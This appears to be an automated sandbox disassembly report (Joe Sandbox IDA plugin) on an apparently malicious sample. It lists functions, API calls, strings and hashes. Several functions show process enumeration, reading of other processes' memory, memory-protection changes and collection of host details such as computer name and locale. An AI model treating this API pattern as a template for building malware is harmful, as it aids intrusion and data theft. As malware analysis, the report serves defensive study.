Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: e7b9cb3ff97e9fe8530363059c1b568236a6dbbc01e08edc4d6d2640a621f97e
Instruction ID: cf5d9c93e90015623ceedd28cd23885c3d9f15cbfc6bace30a270b6224527ddd
Opcode Fuzzy Hash: e7b9cb3ff97e9fe8530363059c1b568236a6dbbc01e08edc4d6d2640a621f97e
Instruction Fuzzy Hash: 7FF0F0B2909710DBD661BBBC9802B4C33A0FF80720F105109F499E62D2DFB449038ADB

Function 00417D60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00417DD4
std::_Xinvalid_argument.LIBCPMT ref: 00417DEF
memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,00409186,?,?,?,?,00000000,?,00001000,?), ref: 00417E44

Part of subcall function 00417E80: std::_Xinvalid_argument.LIBCPMT ref: 00417E98
Part of subcall function 00417E80: std::_Xinvalid_argument.LIBCPMT ref: 00417EB6
Part of subcall function 00417E80: std::_Xinvalid_argument.LIBCPMT ref: 00417ED1
Part of subcall function 00417E80: memcpy.MSVCRT(?,?,?,00000000,?,?,00417DBA,00000000,?,?,00000000,?,00409186,?), ref: 00417F34

Strings

string too long, xrefs: 00417DCF, 00417DEA

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy
String ID: string too long
API String ID: 2304785028-2556327735
Opcode ID: f3f350f5ca3a18f032a25dde2a8975ea80f49d6dc0ad9179ffde5be41f9e09aa
Instruction ID: 8cc79b66cb5b519718e58846ad6fe927743ec070db89bb510543436db22b056f
Opcode Fuzzy Hash: f3f350f5ca3a18f032a25dde2a8975ea80f49d6dc0ad9179ffde5be41f9e09aa
Instruction Fuzzy Hash: 7C31D5323086148BD7209A6CE8809ABF7F5EF92764B20466FF55187781C7759C81839D

Function 00408850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408883

Part of subcall function 0042A383: std::exception::exception.LIBCMT ref: 0042A398
Part of subcall function 0042A383: __CxxThrowException@8.LIBCMT ref: 0042A3AD

Strings

yxxx, xrefs: 004088DA
yxxx, xrefs: 0040888D
vector<T> too long, xrefs: 0040887E

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: vector<T> too long$yxxx$yxxx
API String ID: 2884196479-1517697755
Opcode ID: b6d375bd9d7859bbd86cd9656df10d63bac0162cd2838bb1dbda21e5c2292a03
Instruction ID: f6320a326fa35fb652fe96cf34ebbd2c7a3c7ab078b6e18e070c860f9a0826fc
Opcode Fuzzy Hash: b6d375bd9d7859bbd86cd9656df10d63bac0162cd2838bb1dbda21e5c2292a03
Instruction Fuzzy Hash: 333197B5E005159BCB08DF58C9916AEBBB6EB88310F14827EE905EB385DB34AD01CBD5

Function 0082F2D7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0082F30A
StrCmpCA.SHLWAPI(?,ERROR), ref: 0082F325
lstrcpy.KERNEL32(00000000,ERROR), ref: 0082F386

Strings

ERROR, xrefs: 0082F31F, 0082F380

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: ERROR
API String ID: 3722407311-2861137601
Opcode ID: 632f983ec1a59fbeae9d1682bdc08354ae4e6f1e633237f9836f04f0d4d6b41b
Instruction ID: 84528930ded154b8706dda57b63da950c6ecdc2d64ef42cb98d7e6697ebb9e27
Opcode Fuzzy Hash: 632f983ec1a59fbeae9d1682bdc08354ae4e6f1e633237f9836f04f0d4d6b41b
Instruction Fuzzy Hash: 49211EB46012969BCB14FF7CD849ADD77A8FF14308F048534B949DB642EA38E8A4CBD5

Function 00833107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?), ref: 0083313B
LocalAlloc.KERNEL32(00000040,00000005), ref: 00833149
CharToOemW.USER32(?,00000000), ref: 00833159

Strings

@LC, xrefs: 0083317F

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: AllocCharDefaultLocalLocaleNameUser
String ID: @LC
API String ID: 2580910410-1019364593
Opcode ID: 7120f601cc5f707b86b49f89dfb49de8dd4a7596b3d65c62abdead0d837c5b8c
Instruction ID: b63b0b3a5b4cbc27318802d4f1a43d79c84191f349e33913a4841887e0988af7
Opcode Fuzzy Hash: 7120f601cc5f707b86b49f89dfb49de8dd4a7596b3d65c62abdead0d837c5b8c
Instruction Fuzzy Hash: 4801A272B44718ABD7209B59EC45FAAF7B8FB44B21F00426EFD09D3780D77959008AE1

Function 00832F07 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00832F36
RtlAllocateHeap.NTDLL(00000000), ref: 00832F3D
GetComputerNameA.KERNEL32(00000000,00000104), ref: 00832F51

Strings

@LC, xrefs: 00832F7B

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID: @LC
API String ID: 1664310425-1019364593
Opcode ID: d84918a8bab9d2b40bac2b81053a19d5874cca919af21581d430d2c9d0c7d92e
Instruction ID: 30b5a4768354d0387c421bd5707dd4f042a2c6e66ce88a51e173c76d83bd8a7e
Opcode Fuzzy Hash: d84918a8bab9d2b40bac2b81053a19d5874cca919af21581d430d2c9d0c7d92e
Instruction Fuzzy Hash: E301D672B44614ABC714DF99ED45B9AF7B8F744B21F10026AFD15D3780D7B459008AE1

Function 00408710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408737

Part of subcall function 0042A383: std::exception::exception.LIBCMT ref: 0042A398
Part of subcall function 0042A383: __CxxThrowException@8.LIBCMT ref: 0042A3AD

Strings

yxxx, xrefs: 00408719
vector<T> too long, xrefs: 00408732
yxxx, xrefs: 00408741

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: vector<T> too long$yxxx$yxxx
API String ID: 2884196479-1517697755
Opcode ID: 06048c700276cc93ff33ce3616ad7d162ee1e11297dd13f9dc071f84c650e282
Instruction ID: b8ef7efc7810e4325e39fc60aebade5df8dffd74ddad37b5b040afbd6501b1a9
Opcode Fuzzy Hash: 06048c700276cc93ff33ce3616ad7d162ee1e11297dd13f9dc071f84c650e282
Instruction Fuzzy Hash: 26F06D27B000210BC314A43E9E8449EA94657E539037AD67AE89AFF399DC74EC8285D9

Function 00818D87 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00817C15,00818B14,03C3C3C3,00000401,00817C15,?,00000000,?,00817C15,80000001), ref: 00818DA7
std::exception::exception.LIBCMT ref: 00818DC2
__CxxThrowException@8.LIBCMT ref: 00818DD7

Strings

$KC, xrefs: 00818DD0

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: $KC
API String ID: 3448701045-1012773322
Opcode ID: 00e9350f4e389691169221a073182689fdeb354786622efc1b9613863d1e41cd
Instruction ID: 8b1f566932d7c3539835a2dc8ad9426529afa3f31407aaecd72c768627ca801c
Opcode Fuzzy Hash: 00e9350f4e389691169221a073182689fdeb354786622efc1b9613863d1e41cd
Instruction Fuzzy Hash: 97F08CB1A002099AEB18E6A49C477EEB3B8FF50304F04462CD912D3680FBB4DA0586D6

Function 00408D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,00408C6B,00000000,?,?,00000000), ref: 00408D62
std::exception::exception.LIBCMT ref: 00408D7D
__CxxThrowException@8.LIBCMT ref: 00408D92

Strings

$KC, xrefs: 00408D73, 00408D87, 00408D8A

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: $KC
API String ID: 3448701045-1012773322
Opcode ID: 51656279e56368e7ce8787016bc7534fb037c8a5d6e2363c95d7d4a48b92e3ae
Instruction ID: b2a08596474d7957a22417a507aa23d885842d8934a0086806a9bcddfe39eae7
Opcode Fuzzy Hash: 51656279e56368e7ce8787016bc7534fb037c8a5d6e2363c95d7d4a48b92e3ae
Instruction Fuzzy Hash: 68E02B7050060997CB14FBB49D016BFB3A89F00305F40076EE911A21C1EF78D614C19E

Function 0082C437 Relevance: 6.4, APIs: 5, Instructions: 105stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082C477

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: ad8233c0130a24f88ab602af3c5821d880ebf063a73d3f6edf3306257c85bd54
Instruction ID: 235961ac2885dc919ed2b1ddd9fb72c9ada113a7dcc1cf360d028a58bb76f4a2
Opcode Fuzzy Hash: ad8233c0130a24f88ab602af3c5821d880ebf063a73d3f6edf3306257c85bd54
Instruction Fuzzy Hash: AB31B0B0E002569BCB14AFB8EC89ABE7BB9FF00304F044069E515E7281DB78CD90CB91

Function 0082F0F7 Relevance: 6.3, APIs: 5, Instructions: 95stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082F126
lstrlen.KERNEL32(00000000), ref: 0082F13D
lstrcpy.KERNEL32(00000000,00000000), ref: 0082F164
lstrlen.KERNEL32(00000000), ref: 0082F16B
lstrcpy.KERNEL32(00000000,00434F90), ref: 0082F199

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: 642e70974ba304006ae94c0463111aba4fd0d06d3f67704fd5b0937f8ab7dec8
Instruction ID: d4a0f1e4829ea20df1c8aedfe3b5cb1276355d14ddbffd3f1bafcbe6408ab252
Opcode Fuzzy Hash: 642e70974ba304006ae94c0463111aba4fd0d06d3f67704fd5b0937f8ab7dec8
Instruction Fuzzy Hash: 88314DB5A001A69BC715BB7CEC46A9D7BA9FF40714F444130FA04DB252EB28DCA9C7D2

Function 00833E87 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

Part of subcall function 00837657: lstrcpy.KERNEL32(00000000,ERROR), ref: 00837675

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00833ECD
Process32First.KERNEL32(00000000,00000128), ref: 00833EE0
Process32Next.KERNEL32(00000000,00000128), ref: 00833EF6

Part of subcall function 00837787: lstrlen.KERNEL32(------,00815E52), ref: 00837792
Part of subcall function 00837787: lstrcpy.KERNEL32(00000000), ref: 008377B6
Part of subcall function 00837787: lstrcat.KERNEL32(?,------), ref: 008377C0

Part of subcall function 008376F7: lstrcpy.KERNEL32(00000000), ref: 00837725

CloseHandle.KERNEL32(00000000), ref: 0083402E

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 86ba30f9204512a426729968a4d2093ab3767b347d89881fb66f24320cb6b34b
Instruction ID: 656f6d809c64fd4b210f8ba0be959baca4db469c6bb46c464d3a01bbb20ece02
Opcode Fuzzy Hash: 86ba30f9204512a426729968a4d2093ab3767b347d89881fb66f24320cb6b34b
Instruction Fuzzy Hash: 4F81E370A00614CFC758CF18C948B95B7F1FB84329F29D1A9E4099B2A2D776ED82CF90

Function 0082E947 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0082E98B
lstrcpy.KERNEL32(00000000,?), ref: 0082E9BA
lstrcat.KERNEL32(?,00000000), ref: 0082E9C8
lstrcat.KERNEL32(?,00638B00), ref: 0082E9E3

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: f6b7aebdc9541fb4b4ca913ad3149a4506aafab1321e0bcc7a8426d706d583b2
Instruction ID: 2e6d6696fd764581973bdbb183bb48974a7924ea328e267f794936f31db41c2d
Opcode Fuzzy Hash: f6b7aebdc9541fb4b4ca913ad3149a4506aafab1321e0bcc7a8426d706d583b2
Instruction Fuzzy Hash: 0F5191B5A0011DAFCB14EB68DC86EED7779FF48300F044499BA05D7281EA74AED4CBA1

Function 00832693 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 008326B9
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00832795
VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 008327F7
??_V@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008328D6), ref: 00832809

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: MemoryProcessRead$QueryVirtual
String ID:
API String ID: 268806267-0
Opcode ID: bf9dd57763a3536566a065c2bc79d4865df21d204336eefc4a2e144d3d7958f7
Instruction ID: b3f6ffb89d88c28e21412dd9f212e15f4ed70a4e6661675182f2aab50a09392a
Opcode Fuzzy Hash: bf9dd57763a3536566a065c2bc79d4865df21d204336eefc4a2e144d3d7958f7
Instruction Fuzzy Hash: B541A271A002299BDF10CF68D884BAEB7B6FFD4724F248529E915DB240E334ED518BD0

Function 00814CC7 Relevance: 6.1, APIs: 4, Instructions: 115memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 00814D02
RtlAllocateHeap.NTDLL(00000000), ref: 00814D09
strlen.MSVCRT ref: 00814D96
VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00814E17

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessProtectVirtualstrlen
String ID:
API String ID: 2355128949-0
Opcode ID: f16473a37540a51901c5d734788aa638d0d129d2ef11d876a3004c0bbe0b3cfa
Instruction ID: c3d9fce112a9d76ba10f35f68fce66750e4c4bf70bc7333fe5f9fa5e6024d8bf
Opcode Fuzzy Hash: f16473a37540a51901c5d734788aa638d0d129d2ef11d876a3004c0bbe0b3cfa
Instruction Fuzzy Hash: 8931F8A0B8021C7686306BB56C4AFEF7E5CDFCC752F215253F51856181C9B86581CEFA

Function 008280E7 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 008280FF

Part of subcall function 0083A637: std::exception::exception.LIBCMT ref: 0083A64C
Part of subcall function 0083A637: __CxxThrowException@8.LIBCMT ref: 0083A661
Part of subcall function 0083A637: std::exception::exception.LIBCMT ref: 0083A672

std::_Xinvalid_argument.LIBCPMT ref: 0082811D
std::_Xinvalid_argument.LIBCPMT ref: 00828138
memcpy.MSVCRT(?,?,?,00000000,?,?,00828021,00000000,?,?,00000000,?,008193ED,?), ref: 0082819B

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throwmemcpy
String ID:
API String ID: 285807467-0
Opcode ID: b6a1c629716581b52e68e708abdf709907f11cc0c0bd2c94fa2b28493e39cf69
Instruction ID: 398bb451ac4a8573d2b831fff08c48083974af65755cc412e9fd98d4ede19429
Opcode Fuzzy Hash: b6a1c629716581b52e68e708abdf709907f11cc0c0bd2c94fa2b28493e39cf69
Instruction Fuzzy Hash: 9B21D731301214CFDB24DE6CEC81A2AF7E5FF95714F244A2EE491CB680DB71E8918795

Function 0082EFB7 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0082EFFB
lstrcpy.KERNEL32(00000000,?), ref: 0082F02A
lstrcat.KERNEL32(?,00000000), ref: 0082F038
lstrcat.KERNEL32(?,00638930), ref: 0082F053

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: 9cc5f4f48837b050f6b2b4b6e26b6a0ca4a383e2b77633cfd40bfa615b9ec1a3
Instruction ID: d66ac3db25f190b0f661ba1492d0b5198f76e28e9a62deb2b8c28990c296172e
Opcode Fuzzy Hash: 9cc5f4f48837b050f6b2b4b6e26b6a0ca4a383e2b77633cfd40bfa615b9ec1a3
Instruction Fuzzy Hash: B03181B5A001599BCB18EB68DC45FED77B9FF48300F1044A8BB05D7291DE74AE94CB91

Function 0082CC97 Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0082CCBC
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082CCF9
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082CD28

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s
String ID:
API String ID: 2610293679-0
Opcode ID: b40612fd25f670abc5c2525361bc965727c789082fb9b4ae905687b599823f5c
Instruction ID: b8431ff9c886fa381af2ebb18a7a760660b89765019738b25b635fb6b8a480ec
Opcode Fuzzy Hash: b40612fd25f670abc5c2525361bc965727c789082fb9b4ae905687b599823f5c
Instruction Fuzzy Hash: 4221A0B5A002599FDB20EBB8AD84AED7BB8FF08310F150465E819E7281E67489858795

Function 008283E5 Relevance: 6.1, APIs: 4, Instructions: 79stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0082841C
lstrlen.KERNEL32(00000000), ref: 00828462
lstrcpy.KERNEL32(00000000,00000000), ref: 00828491
StrCmpCA.SHLWAPI(00000000,00434C44), ref: 008284A9
lstrlen.KERNEL32(00000000), ref: 008284E7
lstrcpy.KERNEL32(00000000,00000000), ref: 00828516
strtok_s.MSVCRT ref: 00828526

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID:
API String ID: 3280532728-0
Opcode ID: 15d672ecd9375eec1ed801102a13c61490038a16d483f152d483eea350dc0055
Instruction ID: ddf8c0c8a383213c0ca2e902599b84005463e1d7fdd3ce8c3955dc500ade843d
Opcode Fuzzy Hash: 15d672ecd9375eec1ed801102a13c61490038a16d483f152d483eea350dc0055
Instruction Fuzzy Hash: 5F21E075901216EBDB21DFA8E948B9EBBB4FF40310F148159EC49D7241EB34DE86CB94

Function 008281D7 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 00828216
memcmp.MSVCRT(00000000,?,?,?,00434B48,00000000), ref: 00828230
memchr.MSVCRT ref: 0082824F

Strings

HKC, xrefs: 008281DD, 00828214

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: memchr$memcmp
String ID: HKC
API String ID: 2210787808-2106622862
Opcode ID: b9d862aece4ee9677d3bc088a7b11a40e3bc3b419b4930aa2c22ba220a5863d1
Instruction ID: b54d2a935ba49e4cb3420e8f6e4b7db04148b39c2d83d3b39bb6fbcc1f5ecfca
Opcode Fuzzy Hash: b9d862aece4ee9677d3bc088a7b11a40e3bc3b419b4930aa2c22ba220a5863d1
Instruction Fuzzy Hash: A2210832601624DFCB15CE64EC849AB776AFFC5324B248569EC25CB244CB32DD42C6E0

Function 00829057 Relevance: 6.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00434E08), ref: 00829071
ExitProcess.KERNEL32 ref: 0082907E
strtok_s.MSVCRT ref: 00829090

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID:
API String ID: 3407564107-0
Opcode ID: e29506f4674c2ef21535854101cdfc4015ddced9695546a6a8a6b24cf64a8f41
Instruction ID: f147f5551450fd724009d6caecd7fe1fcd7b6d31f9eded0fd83379dc2a7ee513
Opcode Fuzzy Hash: e29506f4674c2ef21535854101cdfc4015ddced9695546a6a8a6b24cf64a8f41
Instruction Fuzzy Hash: 6F015276A00209FBCB10DFA4EC848DE77BDFF88314F108169E915D7100E7759A858BA5

Function 008337F7 Relevance: 6.0, APIs: 4, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00833826
RtlAllocateHeap.NTDLL(00000000), ref: 0083382D
GlobalMemoryStatusEx.KERNEL32 ref: 00833848
wsprintfA.USER32 ref: 0083386E

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID:
API String ID: 2922868504-0
Opcode ID: 6476a7a4e21804b2a4dc54000014bbd5545afbf6c0da17dd2819ec863194e643
Instruction ID: a4c7d21b70ee046a270544b1beba5d97085c1ae6b1aaf0eec3f51f4806c573de
Opcode Fuzzy Hash: 6476a7a4e21804b2a4dc54000014bbd5545afbf6c0da17dd2819ec863194e643
Instruction Fuzzy Hash: 1201B5B1A04614AFD7049F98DC45BAEB7B9FB44710F100129F916E7380D7B899008AE5

Function 00832F97 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0042A5E0,000000FF), ref: 00832FC6
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00832FCD
GetLocalTime.KERNEL32(?,?,00000000,0042A5E0,000000FF), ref: 00832FD9
wsprintfA.USER32 ref: 00833005

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 37c43ae7653e96529821a6031157e9ef27321789b139977156efb11eb726534c
Instruction ID: e36ea55864ceb75fd556ce5c52734ed0b2613149fd914bf11c9d359ea8bcafb3
Opcode Fuzzy Hash: 37c43ae7653e96529821a6031157e9ef27321789b139977156efb11eb726534c
Instruction Fuzzy Hash: FC0192B2904224ABCB149BC9DD45FBFB7BDFB4CB11F00010AFA05A2280E7B84840C7B1

Function 0082CDB4 Relevance: 6.0, APIs: 4, Instructions: 43stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00434C44), ref: 0082CDBA
StrCmpCA.SHLWAPI(?,00434C48,?,00434C44), ref: 0082CDD1
StrCmpCA.SHLWAPI(?,00434C4C,?,00434C48,?,00434C44), ref: 0082CDE8
strtok_s.MSVCRT ref: 0082CEDE

Memory Dump Source

